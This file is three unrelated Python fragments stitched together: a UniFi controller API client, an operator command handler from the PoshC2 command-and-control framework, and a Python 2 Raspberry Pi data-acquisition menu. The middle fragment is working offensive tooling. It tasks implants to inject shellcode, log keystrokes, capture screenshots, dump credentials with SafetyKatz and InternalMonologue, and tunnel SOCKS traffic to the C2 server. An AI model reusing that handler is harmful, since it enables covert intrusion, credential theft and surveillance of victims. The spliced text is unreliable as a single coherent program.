def get_aps(self):
"""Return a list of all APs,
with significant information about each.
"""
# Set test to 0 instead of NULL
params = {"_depth": 2, "test": 0}
return self._api_read("stat/device", params)
def get_client(self, mac):
"""Get details about a specific client"""
# stat/user/<mac> works better than stat/sta/<mac>
# stat/sta seems to be only active clients
# stat/user includes known but offline clients
return self._api_read("stat/user/" + mac)[0]
def get_clients(self):
"""Return a list of all active clients,
with significant information about each.
"""
return self._api_read("stat/sta")
def get_users(self):
"""Return a list of all known clients,
with significant information about each.
"""
return self._api_read("list/user")
def get_user_groups(self):
"""Return a list of user groups with its rate limiting settings."""
return self._api_read("list/usergroup")
def get_sysinfo(self):
"""Return basic system informations."""
return self._api_read("stat/sysinfo")
def get_healthinfo(self):
"""Return health information."""
return self._api_read("stat/health")
def get_sites(self):
"""Return a list of all sites,
with their UID and description"""
return self._read(self.url + "api/self/sites")
def get_wlan_conf(self):
"""Return a list of configured WLANs
with their configuration parameters.
"""
return self._api_read("list/wlanconf")
def _run_command(self, command, params=None, mgr="stamgr"):
if params is None:
params = {}
self.log.debug("_run_command(%s)", command)
params.update({"cmd": command})
return self._api_write("cmd/" + mgr, params=params)
def _mac_cmd(self, target_mac, command, mgr="stamgr", params=None):
if params is None:
params = {}
self.log.debug("_mac_cmd(%s, %s)", target_mac, command)
params["mac"] = target_mac
return self._run_command(command, params, mgr)
def get_device_stat(self, target_mac):
"""Gets the current state & configuration of
the given device based on its MAC Address.
:param target_mac: MAC address of the device.
:type target_mac: str
:returns: Dictionary containing metadata, state,
capabilities and configuration of the device
:rtype: dict()
"""
self.log.debug("get_device_stat(%s)", target_mac)
params = {"macs": [target_mac]}
return self._api_read("stat/device/" + target_mac, params)[0]
def get_radius_users(self):
"""Return a list of all users, with their
name, password, 24 digit user id, and 24 digit site id
"""
return self._api_read('rest/account')
def add_radius_user(self, name, password):
"""Add a new user with this username and password
:param name: new user's username
:param password: new user's password
:returns: user's name, password, 24 digit user id, and 24 digit site id
"""
params = {'name': name, 'x_password': password}
return self._api_write('rest/account/', params)
def update_radius_user(self, name, password, user_id):
"""Update a user to this new username and password
:param name: user's new username
:param password: user's new password
:param id: the user's 24 digit user id, from get_radius_users()
or add_radius_user()
:returns: user's name, password, 24 digit user id, and 24 digit site id
:returns: [] if no change was made
"""
params = {'name': name, '_id': user_id, 'x_password': password}
return self._api_update('rest/account/' + user_id, params)
def delete_radius_user(self, user_id):
"""Delete user
:param id: the user's 24 digit user id, from get_radius_users()
or add_radius_user()
:returns: [] if successful
"""
return self._api_delete('rest/account/' + user_id)
def get_switch_port_overrides(self, target_mac):
"""Gets a list of port overrides, in dictionary
format, for the given target MAC address. The
dictionary contains the port_idx, portconf_id,
poe_mode, & name.
:param target_mac: MAC address of the device.
:type target_mac: str
:returns: [ { 'port_idx': int(), 'portconf': str,
'poe_mode': str, 'name': str } ]
:rtype: list( dict() )
"""
self.log.debug("get_switch_port_overrides(%s)", target_mac)
return self.get_device_stat(target_mac)["port_overrides"]
def _switch_port_power(self, target_mac, port_idx, mode):
"""Helper method to set the given PoE mode the port/switch.
:param target_mac: MAC address of the Switch.
:type target_mac: str
:param port_idx: Port ID to target
:type port_idx: int
:param mode: PoE mode to set. ie. auto, on, off.
:type mode: str
:returns: { 'port_overrides': [ { 'port_idx': int(),
'portconf': str, 'poe_mode': str, 'name': str } ] }
:rtype: dict( list( dict() ) )
"""
# TODO: Switch operations should most likely happen in a
# different Class, Switch.
self.log.debug(
"_switch_port_power(%s, %s, %s)", target_mac, port_idx, mode
)
device_stat = self.get_device_stat(target_mac)
device_id = device_stat.get("_id")
overrides = device_stat.get("port_overrides")
found = False
if overrides:
for i in overrides:
if overrides[i]["port_idx"] == port_idx:
# Override already exists, update..
overrides[i]["poe_mode"] = mode
found = True
break
if not found:
# Retrieve portconf
portconf_id = None
for port in device_stat["port_table"]:
if port["port_idx"] == port_idx:
portconf_id = port["portconf_id"]
break
if portconf_id is None:
raise APIError(
"Port ID %s not found in port_table" % str(port_idx)
)
overrides.append(
{
"port_idx": port_idx,
"portconf_id": portconf_id,
"poe_mode": mode
}
)
# We return the device_id as it's needed by the parent method
return {"port_overrides": overrides, "device_id": device_id}
def switch_port_power_off(self, target_mac, port_idx):
"""Powers Off the given port on the Switch identified
by the given MAC Address.
:param target_mac: MAC address of the Switch.
:type target_mac: str
:param port_idx: Port ID to power off
:type port_idx: int
:returns: API Response which is the resulting complete port overrides
:rtype: list( dict() )
"""
self.log.debug("switch_port_power_off(%s, %s)", target_mac, port_idx)
params = self._switch_port_power(target_mac, port_idx, "off")
device_id = params["device_id"]
del params["device_id"]
return self._api_update("rest/device/" + device_id, params)
def switch_port_power_on(self, target_mac, port_idx):
"""Powers On the given port on the Switch identified
by the given MAC Address.
:param target_mac: MAC address of the Switch.
:type target_mac: str
:param port_idx: Port ID to power on
:type port_idx: int
:returns: API Response which is the resulting complete port overrides
:rtype: list( dict() )
"""
self.log.debug("switch_port_power_on(%s, %s)", target_mac, port_idx)
params = self._switch_port_power(target_mac, port_idx, "auto")
device_id = params["device_id"]
del params["device_id"]
return self._api_update("rest/device/" + device_id, params)
def create_site(self, desc="desc"):
"""Create a new site.
:param desc: Name of the site to be created.
"""
# TODO: Not currently supported on UDMP as site support doesn't exist.
if self.version == "UDMP-unifiOS":
raise APIError(
"Controller version not supported: %s" % self.version
)
return self._run_command(
"add-site",
params={"desc": desc},
mgr="sitemgr"
)
def block_client(self, mac):
"""Add a client to the block list.
:param mac: the MAC address of the client to block.
"""
return self._mac_cmd(mac, "block-sta")
def unblock_client(self, mac):
"""Remove a client from the block list.
:param mac: the MAC address of the client to unblock.
"""
return self._mac_cmd(mac, "unblock-sta")
def disconnect_client(self, mac):
"""Disconnect a client.
Disconnects a client, forcing them to reassociate. Useful when the
connection is of bad quality to force a rescan.
:param mac: the MAC address of the client to disconnect.
"""
return self._mac_cmd(mac, "kick-sta")
def restart_ap(self, mac):
"""Restart an access point (by MAC).
:param mac: the MAC address of the AP to restart.
"""
return self._mac_cmd(mac, "restart", "devmgr")
def restart_ap_name(self, name):
"""Restart an access point (by name).
:param name: the name address of the AP to restart.
"""
if not name:
raise APIError("%s is not a valid name" % str(name))
for access_point in self.get_aps():
if (
access_point.get("state", 0) == 1
and access_point.get("name", None) == name
):
result = self.restart_ap(access_point["mac"])
return result
def archive_all_alerts(self):
"""Archive all Alerts"""
return self._run_command("archive-all-alarms", mgr="evtmgr")
# TODO: Not currently supported on UDMP as it now utilizes async-backups.
def create_backup(self, days="0"):
"""Ask controller to create a backup archive file
..warning:
This process puts significant load on the controller
and may render it partially unresponsive for other requests.
:param days: metrics of the last x days will be added to the backup.
'-1' backup all metrics. '0' backup only the configuration.
:return: URL path to backup file
"""
if self.version == "UDMP-unifiOS":
raise APIError(
"Controller version not supported: %s" % self.version
)
res = self._run_command(
"backup",
mgr="system",
params={"days": days}
)
return res[0]["url"]
# TODO: Not currently supported on UDMP as it now utilizes async-backups.
def get_backup(self, download_path=None, target_file="unifi-backup.unf"):
"""
:param download_path: path to backup; if None is given
one will be created
:param target_file: Filename or full path to download the
backup archive to, should have .unf extension for restore.
"""
if self.version == "UDMP-unifiOS":
raise APIError(
"Controller version not supported: %s" % self.version
)
if not download_path:
download_path = self.create_backup()
response = self.session.get(self.url + download_path, stream=True)
if response != 200:
raise APIError("API backup failed: %i" % response.status_code)
with open(target_file, "wb") as _backfh:
return shutil.copyfileobj(response.raw, _backfh)
def authorize_guest( # pylint: disable=R0913
self,
guest_mac,
minutes,
up_bandwidth=None,
down_bandwidth=None,
byte_quota=None,
ap_mac=None,
):
"""
Authorize a guest based on his MAC address.
:param guest_mac: the guest MAC address: 'aa:bb:cc:dd:ee:ff'
:param minutes: duration of the authorization in minutes
:param up_bandwidth: up speed allowed in kbps
:param down_bandwidth: down speed allowed in kbps
:param byte_quota: quantity of bytes allowed in MB
:param ap_mac: access point MAC address
"""
cmd = "authorize-guest"
params = {"mac": guest_mac, "minutes": minutes}
if up_bandwidth:
params["up"] = up_bandwidth
if down_bandwidth:
params["down"] = down_bandwidth
if byte_quota:
params["bytes"] = byte_quota
if ap_mac:
params["ap_mac"] = ap_mac
return self._run_command(cmd, params=params)
def unauthorize_guest(self, guest_mac):
"""
Unauthorize a guest based on his MAC address.
:param guest_mac: the guest MAC address: 'aa:bb:cc:dd:ee:ff'
"""
cmd = "unauthorize-guest"
params = {"mac": guest_mac}
return self._run_command(
cmd,
params=params
)
def get_firmware(
self,
cached=True,
available=True,
known=False,
site=False
):
"""
Return a list of available/cached firmware versions
:param cached: Return cached firmwares
:param available: Return available (and not cached) firmwares
:param known: Return only firmwares for known devices
:param site: Return only firmwares for on-site devices
:return: List of firmware dicts
"""
res = []
if cached:
res.extend(self._run_command("list-cached", mgr="firmware"))
if available:
res.extend(self._run_command("list-available", mgr="firmware"))
if known:
res = [fw for fw in res if fw["knownDevice"]]
if site:
res = [fw for fw in res if fw["siteDevice"]]
return res
def cache_firmware(self, version, device):
"""
Cache the firmware on the UniFi Controller
.. warning:: Caching one device might very well cache others,
as they're on shared platforms
:param version: version to cache
:param device: device model to cache (e.g. BZ2)
:return: True/False
"""
return self._run_command(
"download",
mgr="firmware",
params={
"device": device,
"version": version
}
)[0]["result"]
def remove_firmware(self, version, device):
"""
Remove cached firmware from the UniFi Controller
.. warning:: Removing one device's firmware might very well remove
others, as they're on shared platforms
:param version: version to cache
:param device: device model to cache (e.g. BZ2)
:return: True/false
"""
return self._run_command(
"remove",
mgr="firmware",
params={
"device": device,
"version": version
}
)[0]["result"]
def get_tag(self):
"""Get all tags and their member MACs"""
return self._api_read("rest/tag")
def upgrade_device(self, mac, version):
"""
Upgrade a device's firmware to verion
:param mac: MAC of dev
:param version: version to upgrade to
"""
self._mac_cmd(
mac,
"upgrade",
mgr="devmgr",
params={
"upgrade_to_firmware": version
}
)
def provision(self, mac):
"""
Force provisioning of a device
:param mac: MAC of device
"""
self._mac_cmd(mac, "force-provision", mgr="devmgr")
def get_setting(self, section=None, cs_settings=False):
"""
Return settings for this site or controller
:param cs_settings: Return only controller-wide settings
:param section: Only return this/these section(s)
:return: {section:settings}
"""
res = {}
all_settings = self._api_read("get/setting")
if section and not isinstance(section, (list, tuple)):
section = [section]
for setting in all_settings:
s_sect = setting["key"]
if (
(cs_settings and "site_id" in setting)
or (not cs_settings and "site_id" not in setting)
or (section and s_sect not in section)
):
continue
for k in ("_id", "site_id", "key"):
setting.pop(k, None)
res[s_sect] = setting
return res
def update_setting(self, settings):
"""
Update settings
:param settings: {section:{settings}}
:return: resulting settings
"""
res = []
for sect, setting in settings.items():
res.extend(self._api_write("set/setting/" + sect, setting))
return res
def update_user_group(self, group_id, down_kbps=-1, up_kbps=-1):
"""
Update user group bandwidth settings
:param group_id: Group ID to modify
:param down_kbps: New bandwidth in KBPS for download
:param up_kbps: New bandwidth in KBPS for upload
"""
res = None
groups = self.get_user_groups()
for group in groups:
if group["_id"] == group_id:
# Apply setting change
res = self._api_update(
"rest/usergroup/{0}".format(group_id),
{
"qos_rate_max_down": down_kbps,
"qos_rate_max_up": up_kbps,
"name": group["name"],
"_id": group_id,
"site_id": self.site_id,
},
)
return res
raise ValueError("Group ID {0} is not valid.".format(group_id))
def set_client_alias(self, mac, alias):
"""
Set the client alias. Set to "" to reset to default
:param mac: The MAC of the client to rename
:param alias: The alias to set
"""
client = self.get_client(mac)["_id"]
return self._api_update("rest/user/" + client, {"name": alias})
def create_voucher( # pylint: disable=R0913
self,
number,
quota,
expire,
up_bandwidth=None,
down_bandwidth=None,
byte_quota=None,
note=None,
):
"""
Create voucher for guests.
:param number: number of vouchers
:param quota: number of using; 0 = unlimited
:param expire: expiration of voucher in minutes
:param up_bandwidth: up speed allowed in kbps
:param down_bandwidth: down speed allowed in kbps
:param byte_quota: quantity of bytes allowed in MB
:param note: description
"""
cmd = "create-voucher"
params = {
"n": number,
"quota": quota,
"expire": "custom",
"expire_number": expire,
"expire_unit": 1,
}
if up_bandwidth:
params["up"] = up_bandwidth
if down_bandwidth:
params["down"] = down_bandwidth
if byte_quota:
params["bytes"] = byte_quota
if note:
params["note"] = note
res = self._run_command(cmd, mgr="hotspot", params=params)
return self.list_vouchers(create_time=res[0]["create_time"])
def list_vouchers(self, **filter_voucher):
"""
Get list of vouchers
:param filter_voucher: Filter vouchers by create_time, code, quota,
used, note, status_expires, status, ...
"""
if "code" in filter_voucher:
filter_voucher["code"] = filter_voucher["code"].replace("-", "")
vouchers = []
for voucher in self._api_read("stat/voucher"):
voucher_match = True
for key, val in filter_voucher.items():
voucher_match &= voucher.get(key) == val
if voucher_match:
vouchers.append(voucher)
return vouchers
def delete_voucher(self, voucher_id):
"""
Delete / revoke voucher
:param id: id of voucher
"""
cmd = "delete-voucher"
params = {"_id": voucher_id}
self._run_command(cmd, mgr="hotspot", params=params)
|
|
import base64, re, traceback, os, string, sys
from prompt_toolkit import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from poshc2.client.Alias import cs_alias, cs_replace
from poshc2.Colours import Colours
from poshc2.Utils import validate_sleep_time, argp, load_file, gen_key
from poshc2.server.AutoLoads import check_module_loaded, run_autoloads_sharp
from poshc2.client.Help import sharp_help, allhelp
from poshc2.server.Config import PoshInstallDirectory, PoshProjectDirectory, SocksHost, PayloadsDirectory
from poshc2.server.Config import PBindPipeName, PBindSecret
from poshc2.server.Core import print_bad
from poshc2.client.cli.CommandPromptCompleter import FilePathCompleter
from poshc2.server.PowerStatus import getpowerstatus
from poshc2.server.database.DB import new_task, unhide_implant, kill_implant, get_implantdetails, get_sharpurls, get_baseenckey
from poshc2.server.database.DB import select_item, new_c2_message, get_powerstatusbyrandomuri, update_label, get_randomuri
def handle_pbind_pivot_command(command, user, randomuri, implant_id):
# convert randomuri to parent randomuri
oldrandomuri = randomuri
p = get_implantdetails(randomuri)
newimplant_id = re.search(r'(?<=\s)\S*', p.Label).group()
if newimplant_id is not None:
randomuri = get_randomuri(newimplant_id)
# alias mapping
for alias in cs_alias:
if alias[0] == command[:len(command.rstrip())]:
command = alias[1]
# alias replace
for alias in cs_replace:
if command.startswith(alias[0]):
command = command.replace(alias[0], alias[1])
original_command = command
command = command.strip()
run_autoloads_sharp(command, randomuri, user, loadmodule_command="pbind-pivot-loadmodule")
if command.startswith("searchhistory"):
searchterm = (command).replace("searchhistory ", "")
with open('%s/.implant-history' % PoshProjectDirectory) as hisfile:
for line in hisfile:
if searchterm in line.lower():
print(Colours.GREEN + line.replace("+",""))
elif command.startswith("searchhelp"):
searchterm = (command).replace("searchhelp ", "")
helpful = sharp_help.split('\n')
for line in helpful:
if searchterm in line.lower():
print(Colours.GREEN + line)
elif command.startswith("searchallhelp"):
searchterm = (command).replace("searchallhelp ", "")
for line in allhelp:
if searchterm in line.lower():
print(Colours.GREEN + line)
elif command.startswith("upload-file"):
source = ""
destination = ""
if command == "upload-file":
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.upload-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
except KeyboardInterrupt:
return
while not os.path.isfile(source):
print("File does not exist: %s" % source)
source = session.prompt("Location file to upload: ", completer=FilePathCompleter(PayloadsDirectory, glob="*"))
source = PayloadsDirectory + source
destination = session.prompt("Location to upload to: ")
else:
args = argp(command)
source = args.source
destination = args.destination
try:
destination = destination.replace("\\", "\\\\")
print("")
print("Uploading %s to %s" % (source, destination))
uploadcommand = f"upload-file {source} {destination}"
new_task(f"pbind-pivot-command {uploadcommand}", user, randomuri)
except Exception as e:
print_bad("Error with source file: %s" % e)
traceback.print_exc()
elif command.startswith("unhide-implant"):
unhide_implant(oldrandomuri)
elif command.startswith("hide-implant"):
kill_implant(oldrandomuri)
elif command.startswith("inject-shellcode"):
params = re.compile("inject-shellcode", re.IGNORECASE)
params = params.sub("", command)
style = Style.from_dict({
'': '#80d130',
})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of shellcode file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.bin"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
try:
shellcodefile = load_file(path)
if shellcodefile is not None:
new_task("pbind-pivot-command run-exe Core.Program Core Inject-Shellcode %s%s #%s" % (base64.b64encode(shellcodefile).decode("utf-8"), params, os.path.basename(path)), user, randomuri)
except Exception as e:
print("Error loading file: %s" % e)
elif command.startswith("migrate"):
params = re.compile("migrate", re.IGNORECASE)
params = params.sub("", command)
migrate(randomuri, user, params)
elif command == "kill-implant" or command == "exit":
impid = get_implantdetails(randomuri)
ri = input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid.ImplantID)
if ri.lower() == "n":
print("Implant not terminated")
if ri == "" or ri.lower() == "y":
new_task("pbind-pivot-kill", user, randomuri)
kill_implant(oldrandomuri)
elif command == "sharpsocks":
from random import choice
allchar = string.ascii_letters
channel = "".join(choice(allchar) for x in range(25))
sharpkey = gen_key().decode("utf-8")
sharpurls = get_sharpurls()
sharpurls = sharpurls.split(",")
sharpurl = select_item("HostnameIP", "C2Server")
print("\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031")
print("sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN)
print("\nElse\n")
print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN)
ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ")
if ri.lower() == "n":
print("")
if ri == "":
new_task("pbind-pivot-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri)
if ri.lower() == "y":
new_task("pbind-pivot-command run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 2000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", "")), user, randomuri)
elif (command.startswith("stop-keystrokes")):
new_task("pbind-pivot-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("", randomuri)
elif (command.startswith("start-keystrokes")):
check_module_loaded("Logger.exe", oldrandomuri, user)
new_task("pbind-pivot-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
update_label("KEYLOG", randomuri)
elif (command.startswith("get-keystrokes")):
new_task("pbind-pivot-command run-exe Logger.KeyStrokesClass Logger %s" % command, user, randomuri)
elif (command.startswith("get-screenshotmulti")):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(f"pbind-pivot-command {command}", user, randomuri)
update_label("SCREENSHOT", randomuri)
elif (command.startswith("get-screenshot")):
pwrStatus = get_powerstatusbyrandomuri(randomuri)
if (pwrStatus is not None and pwrStatus[7]):
ri = input("[!] Screen is reported as LOCKED, do you still want to attempt a screenshot? (y/N) ")
if ri.lower() == "n" or ri.lower() == "":
return
new_task(f"pbind-pivot-command {command}", user, randomuri)
elif (command == "get-powerstatus"):
getpowerstatus(randomuri)
new_task("pbind-pivot-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
elif (command == "getpowerstatus"):
getpowerstatus(randomuri)
new_task("pbind-pivot-command run-dll PwrStatusTracker.PwrFrm PwrStatusTracker GetPowerStatusResult ", user, randomuri)
elif (command.startswith("stop-powerstatus")):
new_task(f"pbind-pivot-command {command}", user, randomuri)
update_label("", randomuri)
elif (command.startswith("stoppowerstatus")):
new_task(f"pbind-pivot-command {command}", user, randomuri)
update_label("", randomuri)
elif (command.startswith("pslo")):
new_task(f"pbind-{command}", user, randomuri)
elif (command.startswith("run-exe SharpWMI.Program")) and "execute" in command and "payload" not in command:
style = Style.from_dict({'': '#80d130'})
session = PromptSession(history=FileHistory('%s/.shellcode-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style)
try:
path = session.prompt("Location of base64 vbs/js file: ", completer=FilePathCompleter(PayloadsDirectory, glob="*.b64"))
path = PayloadsDirectory + path
except KeyboardInterrupt:
return
if os.path.isfile(path):
with open(path, "r") as p:
payload = p.read()
new_task("pbind-pivot-command %s payload=%s" % (command,payload), user, randomuri)
else:
print_bad("Could not find file")
elif (command.startswith("get-hash")):
check_module_loaded("InternalMonologue.exe", oldrandomuri, user)
new_task("pbind-pivot-command run-exe InternalMonologue.Program InternalMonologue", user, randomuri)
elif (command.startswith("safetykatz")):
new_task("pbind-pivot-command run-exe SafetyKatz.Program %s" % command, user, randomuri)
elif command.startswith("loadmoduleforce"):
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
new_task("pbind-pivot-loadmodule %s" % params, user, randomuri)
elif command.startswith("loadmodule"):
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
new_task("pbind-pivot-loadmodule %s" % params, user, randomuri)
elif command.startswith("listmodules"):
modules = os.listdir("%s/Modules/" % PoshInstallDirectory)
modules = sorted(modules, key=lambda s: s.lower())
print("")
print("[+] Available modules:")
print("")
for mod in modules:
if (".exe" in mod) or (".dll" in mod):
print(mod)
elif command.startswith("modulesloaded"):
ml = get_implantdetails(oldrandomuri)
print(ml.ModsLoaded)
new_task("pbind-pivot-command listmodules", user, randomuri)
elif command == "help" or command == "?":
print(sharp_help)
elif command.startswith("pbind-connect"):
do_pbind_start(user, command, randomuri)
elif command.startswith("beacon") or command.startswith("set-beacon") or command.startswith("setbeacon"):
new_sleep = command.replace('set-beacon ', '')
new_sleep = new_sleep.replace('setbeacon ', '')
new_sleep = new_sleep.replace('beacon ', '').strip()
if not validate_sleep_time(new_sleep):
print(Colours.RED)
print("Invalid sleep command, please specify a time such as 50s, 10m or 1h")
print(Colours.GREEN)
else:
new_task(f"pbind-pivot-command {command}", user, randomuri)
else:
if command:
new_task(f"pbind-pivot-command {original_command}", user, randomuri)
return
def do_pbind_start(user, command, randomuri):
key = get_baseenckey()
if len(command.split()) == 2: # 'pbind-connect <hostname>' is two args
command = f"{command} {PBindPipeName} {PBindSecret} {key}"
elif len(command.split()) == 4: # if the pipe name and secret are already present just add the key
command = f"{command} {key}"
else:
print_bad("Expected 'pbind_connect <hostname>' or 'pbind_connect <hostname> <pipename> <secret>'")
return
if command.startswith("pbind-pivot-command "):
command = command.replace("pbind-pivot-command ", "pbind-pivot-command run-exe PBind PBind ")
elif command.startswith("pbind-connect"):
command = command.replace("pbind-connect ", "pbind-pivot-command run-exe PBind PBind start ")
elif command.startswith("pbind-kill"):
command = command.replace("pbind-kill", "pbind-pivot-command run-exe PBind PBind kill-implant")
new_task(command, user, randomuri)
def migrate(randomuri, user, params=""):
print("Do not use migrate when in a pbind implant - use Inject-Shellcode")
|
|
#-----------------------------------------------------------------
#Imports
#-----------------------------------------------------------------
import time
import os
import sys
import signal
#-----------------------------------------------------------------
# System import for Raspberry Pi drivers
#-----------------------------------------------------------------
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
#-----------------------------------------------------------------
# Adafruit Library for current sense chip
#-----------------------------------------------------------------
import Adafruit_ADS1x15
adc = Adafruit_ADS1x15.ADS1015()
GAIN = 1
#-----------------------------------------------------------------
# Globals
# menuChoice - Variable for the main menu
# storagePath - Variable to define the subfolder to store data
# fileExt - Variable to define the extension of the stored file
# filePath - Variable to define the file name
# sampleRate - Variable to define the amount of time to wait between
# - current sense samples
# temperatureUnit - Variable to define the temperature unit to use
#-----------------------------------------------------------------
menuChoice = ''
storagePath = "/testing/"
fileExt = ".txt"
filePath = 'DefaultName'
sampleRate = 10;
temperatureUnit = "B"
startTime = time.time()
#-----------------------------------------------------------------
# Dictionary of current labels
#-----------------------------------------------------------------
currentLabels = {}
currentLabels['J6']="1V0"
currentLabels['J10']="1V2"
currentLabels['J8']="3V3"
currentLabels['J3']="1V8"
#-----------------------------------------------------------------
# Dictionary of current status
#-----------------------------------------------------------------
currentStatus = {}
currentStatus['J6']="Enabled"
currentStatus['J10']="Enabled"
currentStatus['J8']="Enabled"
currentStatus['J3']="Enabled"
#-----------------------------------------------------------------
# Dictionary of thermocouple labels
#-----------------------------------------------------------------
thermoLabels = {}
thermoLabels['T0']="Thermocouple 0"
thermoLabels['T1']="Thermocouple 1"
thermoLabels['T2']="Thermocouple 2"
thermoLabels['T3']="Thermocouple 3"
thermoLabels['T4']="Thermocouple 4"
thermoLabels['T5']="Thermocouple 5"
thermoLabels['T6']="Thermocouple 6"
thermoLabels['T7']="Thermocouple 7"
#-----------------------------------------------------------------
# Dictionary of thermocouple addresses
#-----------------------------------------------------------------
thermoAddress = {}
thermoAddress['T0']="3b-0cdc03883a4a"
thermoAddress['T1']="3b-2cdc03883a8c"
thermoAddress['T2']="3b-0cdc03883a65"
thermoAddress['T3']="3b-0cdc03883a6f"
thermoAddress['T4']="3b-0cdc03883a53"
thermoAddress['T5']="3b-2cdc03883a9f"
thermoAddress['T6']="3b-2cdc03883a78"
thermoAddress['T7']="3b-2cdc03883a82"
#-----------------------------------------------------------------
# Dictionary of thermocouple status
#-----------------------------------------------------------------
thermoStatus = {}
thermoStatus['T0']="Enabled"
thermoStatus['T1']="Enabled"
thermoStatus['T2']="Enabled"
thermoStatus['T3']="Enabled"
thermoStatus['T4']="Enabled"
thermoStatus['T5']="Enabled"
thermoStatus['T6']="Enabled"
thermoStatus['T7']="Enabled"
#-----------------------------------------------------------------
# Globals to define the path to get the temperature data
#-----------------------------------------------------------------
tcStart = '/sys/bus/w1/devices/'
tcEnd = '/w1_slave'
#-----------------------------------------------------------------
# Welcome prompt
#-----------------------------------------------------------------
print('---------------------------------------------------\n')
print('Welcome to the Raspberry Pi Data Acquistion System!')
print('---------------------------------------------------\n')
#-----------------------------------------------------------------
# Menu definition dictionary
#-----------------------------------------------------------------
menu = {}
menu['F']="- Set the filename for recording."
menu['R']="- Set the sample rate for recording."
menu['T']="- Set the thermocouple labels."
menu['E']="- Enable/Disable thermocouple channels."
menu['U']="- Set temperature unit."
menu['C']="- Set the current sensor labels."
menu['N']="- Enable/Disable current channels."
menu['M']="- Set ADAS modes and durations."
menu['D']="- Display Settings."
menu['S']="- Start the DAQ."
menu['A']="- Autodetect Sensors."
menu['Q']="- Quit."
#-----------------------------------------------------------------
# Function to handle Ctrl+C exit
#-----------------------------------------------------------------
def signal_handler(signal, frame):
print('Data Acquistion is complete')
sys.exit(0)
#-----------------------------------------------------------------
# Function to change the current sensor label
#-----------------------------------------------------------------
def currentInput(tempChoice):
validFlag = False
#Loop until valid response
while validFlag == False:
#Input prompt
print "Selected " + tempChoice + " to change. Please enter a new label : "
newLabel = raw_input()
#Check for blank
if newLabel == '':
print "Cannot be blank!\n"
else:
#Once valid, return the input
print "Label changed to " + newLabel
return newLabel
#-----------------------------------------------------------------
# Function to select which current label to change
#-----------------------------------------------------------------
def setCurrentLabels():
currentLoop = False
# Loop until Q
while currentLoop == False:
# Get all the current label keys
currentKeys = currentLabels.keys()
# Sort the keys alphabetically
currentKeys.sort()
# Loop through dictionary and display
for entry in currentKeys:
print entry, " - ", currentLabels[entry]
#Get the label selection
currentChoice = raw_input("Select label to change (Q to quit): ")
# Verify selection and prompt the new label and set the label
if currentChoice == 'J3':
currentLabels['J3'] = currentInput(currentLabels[currentChoice])
elif currentChoice == 'J6':
currentLabels['J6'] = currentInput(currentLabels[currentChoice])
elif currentChoice == 'J8':
currentLabels['J8'] = currentInput(currentLabels[currentChoice])
elif currentChoice == 'J10':
currentLabels['J10'] = currentInput(currentLabels[currentChoice])
elif currentChoice.upper() == 'Q':
currentLoop = True
else:
print "Not a valid choice!\n"
#-----------------------------------------------------------------
# Function to toggle the status of the sensor from enable/disabled
#-----------------------------------------------------------------
def toggleSensor(tempName, tempValue):
#If the state is enabled, toggle it to disabled
if tempValue == "Enabled":
print "Sensor " + tempName + " has been disabled.\n"
return "Disabled"
#if the state is disabled, toggle it to enabled
else:
print "Sensor " + tempName + " has been enabled.\n"
return "Enabled"
#-----------------------------------------------------------------
# Function to toggle current sensors between enabled and disabled
#-----------------------------------------------------------------
def currentEnDis():
currentLoop = False
#Loop until Q
while currentLoop == False:
#Get the current label keys
currentKeys = currentLabels.keys()
#Sort the keys and print the keys
currentKeys.sort()
for entry in currentKeys:
print entry + "\t-\t" + currentLabels[entry] + "\t-\t" + currentStatus[entry]
#Get the users key choice
currentChoice = raw_input("Select thermocouple to toggle (Q to quit): ")
#Based on selection, toggle the status of the current sensor
if currentChoice == 'J3':
currentStatus['J3'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
elif currentChoice == 'J6':
currentStatus['J6'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
elif currentChoice == 'J8':
currentStatus['J8'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
elif currentChoice == 'J10':
currentStatus['J10'] = toggleSensor(currentLabels[currentChoice], currentStatus[currentChoice])
elif currentChoice.upper() == 'Q':
currentLoop = True
else:
print "Not a valid choice!\n"
#-----------------------------------------------------------------
